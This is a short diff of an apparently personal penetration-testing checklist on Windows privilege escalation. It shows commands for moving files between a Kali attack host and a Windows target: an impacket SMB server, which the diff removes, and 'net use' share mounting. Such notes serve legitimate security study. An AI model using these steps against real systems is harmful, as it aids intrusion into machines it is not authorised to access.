Gfuen/Checklist/Privilege Escalation/windows.md

 * File Transfer (use BASH ALIAS function for powershell)

 ```
-# On KALI
-# use double-quotes if file path has spaces in it
-sudo impacket-smbserver abcd /path/to/serve

 # mount drives
 net use abcd: \\kali_ip\myshare
 net use abcd: /d # disconnect